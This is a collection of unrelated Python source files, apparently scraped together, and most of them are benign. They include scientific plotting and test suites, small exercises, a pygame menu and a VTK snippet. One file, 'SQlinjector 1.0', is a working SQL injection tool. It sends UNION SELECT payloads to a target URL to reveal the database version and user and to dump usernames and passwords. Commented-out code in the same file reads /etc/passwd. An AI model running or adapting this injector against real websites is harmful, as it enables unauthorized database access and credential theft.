self.assertEqual(type(obs), SparseTaxonTable)
# one_to_many='divide'
exp_data = array([[1/6, 0.0, 0.25, 0.4],
[0.5, 0.4, 0.25, 0.6],
[1/6, 0.2, 0.125, 0.0],
[0.0, 0.2, 0.25, 0.0],
[1/6, 0.2, 0.125, 0.0]])
exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
['a;b;Other', 'a;b;c', 'a;bb;Other', 'a;bb;c',
'b;Other;Other'])
# Using absolute abundance input table.
obs = make_summary(self.otu_table_one_to_many, 3, one_to_many='divide')
self.assertEqual(obs, exp)
self.assertEqual(type(obs), SparseTaxonTable)
# Using relative abundance input table. Should get same result as
# above.
obs = make_summary(
self.otu_table_one_to_many.normObservationBySample(), 3,
one_to_many='divide')
self.assertEqual(obs.SampleIds, exp.SampleIds)
self.assertEqual(obs.ObservationIds, exp.ObservationIds)
self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
self.assertEqual(type(obs), SparseTaxonTable)
def test_add_summary_mapping(self):
"""add_summary_mapping works"""
mapping, header, comments = parse_mapping_file(self.mapping)
summary, taxon_order = add_summary_mapping(self.otu_table, mapping, 3,
absolute_abundance=True,
delimiter='FOO')
self.assertEqual(taxon_order, ('RootFOOBacteriaFOOActinobacteria',
'RootFOOBacteriaFOOFirmicutes',
'RootFOOBacteriaFOOOther'))
self.assertEqual(summary, {'s1':[1,1,1],
's2':[0,3,2],
's3':[2,1,1],
's4':[4,1,0]})
def test_make_collapse_fn_invalid_input(self):
"""_make_collapse_fn correctly handles invalid input"""
with self.assertRaises(ValueError):
_make_collapse_fn(1, one_to_many='foo')
#run unit tests if run from command-line
if __name__ == '__main__':
main()
|
def longestWord(words):
words.sort();
return words
words = ["rac","rs","ra","on","r","otif","o","onpdu","rsf","rs","ot","oti","racy","onpd"]
print longestWord(words)
print words
|
__author__ = 'Elisabetta Ronchieri'
import unittest
from tstorm.tests.atomic import atomics
from tstorm.tests.load import loads
from tstorm.tests import utilities
def ts_storm_get_transfer_protocols(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_get_transfer_protocols',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_ls_unexist_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_ls_unexist_dir(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_ls_unexist_dir',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_rm_unexist_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_rm_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_rm_unexist_dir(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_rm_unexist_dir',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_mkdir(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_mkdir_exist(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir_exist_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_rm_dir(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir_exist_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_ls_dir(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir_exist_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
return s
def ts_storm_prepare_to_put(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_prepare_to_put',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_fake_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_prepare_to_put_exist_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(atomics.AtomicsTest('test_lcg_cp_out',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_prepare_to_put_exist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_put_done(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_put_done',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_fake_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_ls_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_prepare_to_put',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_fake_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_rm_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_mkdir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_prepare_to_put',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_fake_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_prepare_to_get(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(atomics.AtomicsTest('test_lcg_cp_out',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_prepare_to_get',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_prepare_to_get_unexist_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_prepare_to_get_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
def ts_storm_release_file(conf, ifn, dfn, bifn, uid, lfn):
s = unittest.TestSuite()
s.addTest(utilities.UtilitiesTest('test_dd',conf, ifn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_unexist_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(atomics.AtomicsTest('test_lcg_cp_out',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_ls_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_release_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_file',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(loads.LoadsTest('test_storm_rm_dir',conf, ifn, dfn, bifn, uid, lfn))
s.addTest(utilities.UtilitiesTest('test_rm_lf',conf, ifn, bifn, uid, lfn))
return s
|
def fibonacci(n):
if n == 0 or n == 1:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
print(fibonacci(10))
def fibonacci_v2(n):
a = 0
b = 1
if n < 0:
print("Incorrect input")
elif n == 0:
return 0
elif n == 1:
return b
else:
for i in range(1, n):
c = a + b
a = b
b = c
return b
print(fibonacci_v2(10))
|
import commands
import parameters
import subprocess
class Jarvis:
def __init__(self):
pass
def say(self, phrase):
print('"' + phrase + '"')
def listen(self):
phrase = input("> ")
return phrase
def process(self, phrase):
"""
Execute actions depending on @phrase.
@phrase should always be lower case.
"""
if not ("jarvis" in phrase):
return
words = phrase.split(" ")
if words[1] == "open":
name = "".join(words[2:])
try:
subprocess.call(name)
self.say(f"Opening {name}.")
except FileNotFoundError:
self.say(f"Could not find {name}.")
return
elif words[1] == "brightness":
try:
assert commands.brightness(words[2]) == 0
except (AssertionError, IndexError):
self.say("Error in brightness command.")
elif words[1] == "volume":
try:
assert commands.volume(words[2]) == 0
except (AssertionError, IndexError):
self.say("Error in volume command.")
elif "hello" in phrase:
self.say(f"Hello, {parameters.NAME}.")
else:
self.say("I cannot execute your command yet.")
|
#!/usr/bin/env python3
import dadi
import matplotlib
import pylab
import numpy
from dadi import Numerics, Inference
def plot_1d_comp_multinom(model, data, fig_num=None, residual='Anscombe',
plot_masked=False):
"""
Mulitnomial comparison between 1d model and data.
model: 1-dimensional model SFS
data: 1-dimensional data SFS
fig_num: Clear and use figure fig_num for display. If None, an new figure
window is created.
residual: 'Anscombe' for Anscombe residuals, which are more normally
distributed for Poisson sampling. 'linear' for the linear
residuals, which can be less biased.
plot_masked: Additionally plots (in open circles) results for points in the
model or data that were masked.
This comparison is multinomial in that it rescales the model to optimally
fit the data.
"""
model = Inference.optimally_scaled_sfs(model, data)
plot_1d_comp_Poisson(model, data, fig_num, residual,
plot_masked)
def plot_1d_comp_Poisson(model, data, fig_num=None, residual='Anscombe',
plot_masked=False, show=True):
"""
Poisson comparison between 1d model and data.
model: 1-dimensional model SFS
data: 1-dimensional data SFS
fig_num: Clear and use figure fig_num for display. If None, an new figure
window is created.
residual: 'Anscombe' for Anscombe residuals, which are more normally
distributed for Poisson sampling. 'linear' for the linear
residuals, which can be less biased.
plot_masked: Additionally plots (in open circles) results for points in the
model or data that were masked.
show: If True, execute pylab.show command to make sure plot displays.
"""
if fig_num is None:
f = pylab.gcf()
else:
f = pylab.figure(fig_num, figsize=(10,8))
pylab.clf()
if data.folded and not model.folded:
model = model.fold()
masked_model, masked_data = Numerics.intersect_masks(model, data)
ax = pylab.subplot(2,1,1)
pylab.semilogy(masked_data, '-ob')
pylab.semilogy(masked_model, '-or')
if plot_masked:
pylab.semilogy(masked_data.data, '--ob', mfc='w', zorder=-100)
pylab.semilogy(masked_model.data, '--or', mfc='w', zorder=-100)
pylab.subplot(2,1,2, sharex = ax)
if residual == 'Anscombe':
resid = Inference.Anscombe_Poisson_residual(masked_model, masked_data)
elif residual == 'linear':
resid = Inference.linear_Poisson_residual(masked_model, masked_data)
else:
raise ValueError("Unknown class of residual '%s'." % residual)
pylab.plot(resid, '-og')
pylab.ylim(-160,120)
if plot_masked:
pylab.plot(resid.data, '--og', mfc='w', zorder=-100)
ax.set_xlim(0, data.shape[0]-1)
if show:
pylab.show()
def three_epoch(params, ns, pts):
"""
params = (nuB,nuF,TB,TF)
ns = (n1,)
nuB: Ratio of bottleneck population size to ancient pop size
nuF: Ratio of contemporary to ancient pop size
TB: Length of bottleneck (in units of 2*Na generations)
TF: Time since bottleneck recovery (in units of 2*Na generations)
n1: Number of samples in resulting Spectrum
pts: Number of grid points to use in integration.
"""
nuB,nuF,TB,TF,F = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TB, nuB)
phi = dadi.Integration.one_pop(phi, xx, TF, nuF)
fs = dadi.Spectrum.from_phi_inbreeding(phi, ns, (xx,), (F,), (2,))
return fs
def three_epoch_noF(params, ns, pts):
"""
params = (nuB,nuF,TB,TF)
ns = (n1,)
nuB: Ratio of bottleneck population size to ancient pop size
nuF: Ratio of contemporary to ancient pop size
TB: Length of bottleneck (in units of 2*Na generations)
TF: Time since bottleneck recovery (in units of 2*Na generations)
n1: Number of samples in resulting Spectrum
pts: Number of grid points to use in integration.
"""
nuB,nuF,TB,TF = params
xx = dadi.Numerics.default_grid(pts)
phi = dadi.PhiManip.phi_1D(xx)
phi = dadi.Integration.one_pop(phi, xx, TB, nuB)
phi = dadi.Integration.one_pop(phi, xx, TF, nuF)
fs = dadi.Spectrum.from_phi(phi, ns, (xx,))
return fs
if __name__ == "__main__":
data = dadi.Spectrum.from_file("cabbage.fs")
data = data.fold()
pts_l = [100,110,120]
func1 = three_epoch
func1_ex = dadi.Numerics.make_extrap_log_func(func1)
func2 = three_epoch_noF
func2_ex = dadi.Numerics.make_extrap_log_func(func2)
popt = [1.810449088130342,12.2790194725467110,0.47393521119534737,0.00921096365957015,0.577870722504928]
popt_noF = [6.4524615672350958,0.0309347139612217,0.153264805381591,0.00100000000000000]
model = func1_ex(popt, data.sample_sizes, pts_l)
model = model.fold()
model_noF = func2_ex(popt_noF, data.sample_sizes, pts_l)
model_noF = model_noF.fold()
plot_1d_comp_multinom(model,data, fig_num=1)
#plt.savefig("puma_fit.pdf")
#plt.close()
plot_1d_comp_multinom(model_noF, data, fig_num=2)
#plt.savefig("puma_fit_noF.pdf")
#plt.close()
|
import math
co = float(input('Comprimento do cateto aposto: '))
ca = float(input('Comprimento do cateto adiacente: '))
hi = math.hypot(co, ca)
print(f'A hipotenusa vai midir {hi:.2f}')
|
import requests
import sys
import getopt
import re
from termcolor import colored
def banner():
print "\n***************************************"
print "* SQlinjector 1.0 *"
print "***************************************"
def usage():
print "Usage:"
print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
print " -i: injection strings file \n"
print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
def start(argv):
banner()
if len(sys.argv) < 2:
usage()
sys.exit()
try:
opts, args = getopt.getopt(argv,"w:i:")
except getopt.GetoptError:
print "Error en arguments"
sys.exit()
for opt,arg in opts :
if opt == '-w' :
url=arg
elif opt == '-i':
dictio = arg
try:
print "[-] Opening injections file: " + dictio
f = open(dictio, "r")
name = f.read().splitlines()
except:
print"Failed opening file: "+ dictio+"\n"
sys.exit()
launcher(url,name)
def launcher (url,dictio):
injected = []
for x in dictio:
sqlinjection=x
injected.append(url.replace("FUZZ",sqlinjection))
res = injector(injected)
print colored('[+] Detection results:','green')
print "------------------"
for x in res:
print x.split(";")[0]
print colored ('[+] Detect columns: ','green')
print "-----------------"
res = detect_columns(url)
print "Number of columns: " + res
'''res = detect_columns_names(url)
print "[+] Columns names found: "
print "-------------------------"
for col in res:
print col'''
print colored('[+] DB version: ','green')
print "---------------"
detect_version(url)
print colored('[+] Current USER: ','green')
print "---------------"
detect_user(url)
'''print colored('[+] Get tables names:','green')
print "---------------------"
detect_table_names(url)
'''
print colored('[+] Attempting MYSQL user extraction','green')
print "-------------------------------------"
steal_users(url)
'''filename="/etc/passwd"
message = "\n[+] Reading file: " + filename
print colored(message,'green')
print "---------------------------------"
read_file(url,filename)
'''
def injector(injected):
errors = ['Mysql','error in your SQL']
global results
results = []
for y in injected:
print "[-] Testing errors: " + y
req=requests.get(y)
for x in errors:
if req.content.find(x) != -1:
res = y + ";" + x
results.append(res)
return results
def detect_columns(url):
new_url= url.replace("FUZZ","admin' order by X-- -")
y=1
while y < 20:
req=requests.get(new_url.replace("X",str(y)))
if req.content.find("Unknown") == -1:
y+=1
else:
break
#print "the no of columns are"+str(y-1)
return str(y-1)
def detect_version(url):
new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK'),3--%20+")
req=requests.get(new_url)
raw = req.content
reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
version=re.findall(reg,req.content)
for ver in version:
print ver
return ver
def detect_user(url):
global users
new_url= url.replace("FUZZ","\'%20union%20select%201,CONCAT('TOK',user(),'TOK'),3%20from%20users--%20+")
req=requests.get(new_url)
raw = req.content
reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
curusers=re.findall(reg,req.content)
for users in curusers:
print users
return users
def steal_users(url):
global user
global paswrd
new_url= url.replace("FUZZ","\'%20union%20select%201,concat(concat('TOK',username,'TOK'),concat(0x3a3a),concat('WOK',password,'WOK')),3%20from%20users--%20+")
req=requests.get(new_url)
reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
reg2 = ur"WOK([\*a-zA-Z0-9].+?)WOK+?"
users=re.findall(reg,req.content)
paswd=re.findall(reg2,req.content)
print "The Usernames are:-"
for user in users:
print user
print "-------------------------------------"
print "the passwords are:"
for paswrd in paswd:
print paswrd
return(user,paswrd)
'''def read_file(url, filename):
new_url= url.replace("FUZZ","""A\'%20union%20SELECT%201,CONCAT('TOK',
LOAD_FILE(\'"+filename+"\'),'TOK')--%20-""")
req=requests.get(new_url)
reg = ur"TOK(.+?)TOK+?"
files= re.findall(reg,req.content)
print req.content
for x in files:
if not x.find('TOK,'):
print x'''
'''def detect_table_names(url):
new_url= url.replace("FUZZ","\'%20union%20SELECT%20CONCAT('TOK',table_schema,'TOK'),CONCAT('TOK',table_name,'TOK')%20FROM%20information_schema.tables%20WHERE%20table_schema%20!=%20%27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27%20and%20table_schema%20!=%20%27performance_schema%27%20--%20-")
req=requests.get(new_url)
raw = req.content
reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
tables=re.findall(reg,req.content)
for table in tables:
print table
def detect_columns_names(url):
column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
new_url= url.replace("FUZZ","admin' group by X-- -")
valid_cols = []
for name in column_names:
req=requests.get(new_url.replace("X",name))
if req.content.find("Unknown") == -1:
valid_cols.append(name)
else:
pass
return valid_cols
'''
if __name__ == "__main__":
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print "SQLinjector interrupted by user..!!"
|
#!/usr/bin/env python2.7
"""A visualisation of playback progress using a bar."""
from progress.bar import Bar
class NullBar(Bar):
"""Use an empty bar if in debug mode."""
def __init__(self):
"""Do nothing on initialisation."""
pass
def next(self, n=1):
"""Do nothing on update."""
pass
class PlaybackBar(Bar):
"""Playback Bar used during playback to represent progress."""
def __init__(self, *args, **kwargs):
"""Initialise the bar with default settings.
Include relevant playback information, such as the elapsed amount of
time, the total amount of time and the current state of the player.
"""
self.player = kwargs['player']
super(PlaybackBar, self).__init__(*args, **kwargs)
total = "%02d:%02d" % (divmod(self.max, 60))
self.suffix = '%(elapsed)s / ' + total + ' / ' + '%(state)s'
@property
def elapsed(self):
"""Get the currently elapsed amount of seconds."""
return "%02d:%02d" % (divmod(self.index, 60))
@property
def state(self):
"""Get the current state of the player."""
return self.player.state
|
import asyncio
from typing import Deque
from unittest.mock import Mock
import pytest
from .context import ZergBot, Composer
@pytest.mark.asyncio
async def test_updates_multiple_bots():
one_bot = ZergBot(Deque([]))
two_bot = ZergBot(Deque([]))
bots = [one_bot, two_bot]
composer = Composer(bots)
composer.state = Mock()
for bot in bots:
bot._prepare_step = Mock(return_value=None)
on_step_stub = Mock(return_value=None)
bot.on_step = asyncio.coroutine(on_step_stub)
bot._prepare_first_step = Mock(return_value=None)
iteration = 1
await composer.on_step(iteration)
for bot in bots:
bot._prepare_step.assert_called_once_with(composer.state)
bot._prepare_first_step.assert_not_called()
on_step_stub.assert_called_once_with(iteration)
@pytest.mark.asyncio
async def test_prepare_first_step():
one_bot = ZergBot(Deque([]))
two_bot = ZergBot(Deque([]))
bots = [one_bot, two_bot]
composer = Composer(bots)
composer.state = Mock()
for bot in bots:
on_step_stub = Mock(return_value=None)
bot.on_step = asyncio.coroutine(on_step_stub)
bot._prepare_step = Mock(return_value=None)
bot._prepare_first_step = Mock(return_value=None)
iteration = 0
await composer.on_step(iteration)
for bot in bots:
bot._prepare_step.assert_called_once_with(composer.state)
bot._prepare_first_step.assert_called_once()
on_step_stub.assert_called_once_with(iteration)
@pytest.mark.asyncio
async def test_prepare_start():
one_bot = ZergBot(Deque([]))
two_bot = ZergBot(Deque([]))
bots = [one_bot, two_bot]
composer = Composer(bots)
# composer.state = Mock()
composer._client = Mock()
composer.player_id = 2
composer._game_info = Mock()
composer._game_data = Mock()
for bot in bots:
bot._prepare_start = Mock(return_value=None)
composer.on_start()
for bot in bots:
bot._prepare_start.assert_called_with(composer._client,
composer.player_id,
composer._game_info,
composer._game_data)
|
import pygame
import pytmx
from pytmx.util_pygame import load_pygame
from com.wwa.main.wwa import Wwa
MAP_MENU_BACKGROUND_TMX = "../map/menu_background.tmx"
PIC_MENU_PNG = '../pic/menu.png'
HATICON_PNG = '../pic/haticon.png'
pygame.init()
class GameMenu():
def __init__(self, screen, items, bg_color=(0, 0, 0), font=None, font_size=70,
font_color=(15, 12, 0)):
self.screen = screen
self.back_img = pygame.Surface((42 * 32, 42 * 32))
self.scr_width = self.screen.get_rect().width
self.scr_height = self.screen.get_rect().height
self.bg_color = bg_color
self.clock = pygame.time.Clock()
self.items = items
self.font = pygame.font.SysFont(font, font_size)
self.font_color = font_color
self.menu_image = pygame.image.load(PIC_MENU_PNG)
self.back_map = load_pygame(MAP_MENU_BACKGROUND_TMX)
self.items = []
for index, item in enumerate(items):
label = self.font.render(item, 1, font_color)
width = label.get_rect().width
height = label.get_rect().height
posx = (self.scr_width / 2) - (width / 2)
t_h = len(items) * height
posy = (self.scr_height / 2 ) - (t_h / 2) + (index * height)
self.items.append([item, label, (width, height), (posx, posy)])
def redraw_menu(self, new=None):
for name, label, (width, height), (posx, posy) in self.items:
if new is not None and new == name:
new = self.font.render(name, 1, (255, 255, 0))
self.screen.blit(new, (posx, posy + 45))
else:
self.screen.blit(label, (posx, posy + 45))
def run(self):
self.redraw_map()
screen.blit(self.back_img, (0, 0))
screen.blit(self.menu_image, (190, 100))
self.redraw_menu()
pygame.display.update()
mainloop = True
xmove = 0
inc = -1
while mainloop:
self.clock.tick(50)
posm =pygame.mouse.get_pos()
click = pygame.mouse.get_pressed()
new = None
for name, label, (width, height), (posx, posy) in self.items:
if posm[0] > posx and posm[0] < posx + width and posm[1] > posy and posm[1] < posy + height:
new = name
pygame.display.update()
if click[0] and name == 'Quit':
mainloop = False
if click[0] and name == 'Start':
Wwa(1, True, False)
if click[0] and name == 'About':
print('About - is clicked')
screen.blit(self.back_img, (xmove, 0))
if xmove <= -400:
inc = 1
if xmove > 0:
inc =-1
xmove += inc;
screen.blit(self.menu_image, (190, 100))
self.redraw_menu(new)
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.QUIT:
mainloop = False
def redraw_map(self):
for layer in self.back_map.visible_layers:
if isinstance(layer, pytmx.TiledTileLayer):
for x in range(0, 40):
for y in range(0, 40):
image = self.back_map.get_tile_image(x, y, 0)
if image != None:
self.back_img.blit(image, (32 * x, 32 * y))
if __name__ == "__main__":
# Creating the screen
screen = pygame.display.set_mode((800, 800), 0, 32)
icon = pygame.image.load(HATICON_PNG)
pygame.display.set_icon(icon)
menu_items = ('Start', 'About', 'Quit')
pygame.display.set_caption('Wild West Adventure')
gm = GameMenu(screen, menu_items, (175,159,75),'JOKERMAN')
gm.run()
|
a=int(input("請輸入一個度數:"))
if a<=120:
print("Summmer months:"+str(2.1*a))
print("Non-Summmer months:"+str(2.1*a))
elif a>=121 and a<=330:
print("Summmer months:"+str(120*2.1+(a-120)*3.02))
print("Non-Summmer months:"+str(120*2.1+(a-120)*2.68))
elif a>=331 and a<=500:
print("Summmer months:"+str(120*2.1+210*3.02+(a-330)*4.39))
print("Non-Summmer months:"+str(120*2.1+210*2.68+(a-330)*3.61))
elif a>=501 and a<=700:
print("Summmer months:"+str(120*2.1+210*3.02+170*4.39+(a-500)*4.97))
print("Non-Summmer months:"+str(120*2.1+210*2.68+170*3.61+(a-500)*4.01))
else:
print("Summmer months:"+str(120*2.1+210*3.02+170*4.39+200*4.97+(a-700)*5.63))
print("Non-Summmer months:"+str(120*2.1+210*2.68+170*3.61+200*4.01+(a-700)*4.5))
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
import os.path
import math
from PyQt4 import QtCore, QtGui
QtCore.Signal = QtCore.pyqtSignal
import vtk
from vtk.qt4.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor
class VTKFrame(QtGui.QFrame):
def __init__(self, parent = None):
super(VTKFrame, self).__init__(parent)
self.vtkWidget = QVTKRenderWindowInteractor(self)
vl = QtGui.QVBoxLayout(self)
vl.addWidget(self.vtkWidget)
vl.setContentsMargins(0, 0, 0, 0)
self.ren = vtk.vtkRenderer()
self.vtkWidget.GetRenderWindow().AddRenderer(self.ren)
self.iren = self.vtkWidget.GetRenderWindow().GetInteractor()
# Construct a Cylinder from (x1, y1, z1) to (x2, y2, z2), the inner and outer radius r1, r2
x1, y1, z1 = 10, 2, 3
x2, y2, z2 = 10, 20, 30
r1, r2 = 3, 8
dx, dy, dz = x2-x1, y2-y1, z2-z1
# create axis object
axisSource = vtk.vtkLineSource()
axisSource = vtk.vtkLineSource()
axisSource.SetPoint1(x1, y1, z1)
axisSource.SetPoint2(x2, y2, z2)
axisMapper = vtk.vtkPolyDataMapper()
axisMapper.SetInputConnection(axisSource.GetOutputPort())
axisActor = vtk.vtkActor()
axisActor.GetProperty().SetColor(0, 0, 1)
axisActor.SetMapper(axisMapper)
self.ren.AddActor(axisActor)
# Create planes
plane1 = vtk.vtkPlane()
plane1.SetOrigin(x1, y1, z1)
plane1.SetNormal(-dx, -dy, -dz)
plane2 = vtk.vtkPlane()
plane2.SetOrigin(x2, y2, z2)
plane2.SetNormal(dx, dy, dz)
# Create cylinders
out_cylinder = vtk.vtkCylinder()
out_cylinder.SetCenter(0, 0, 0)
out_cylinder.SetRadius(r2)
in_cylinder = vtk.vtkCylinder()
in_cylinder.SetCenter(0, 0, 0)
in_cylinder.SetRadius(r1)
# The rotation axis of cylinder is along the y-axis
# What we need is the axis (x2-x1, y2-y1, z2-z1)
angle = math.acos(dy/math.sqrt(dx**2 + dy**2 + dz**2)) * 180.0 / math.pi
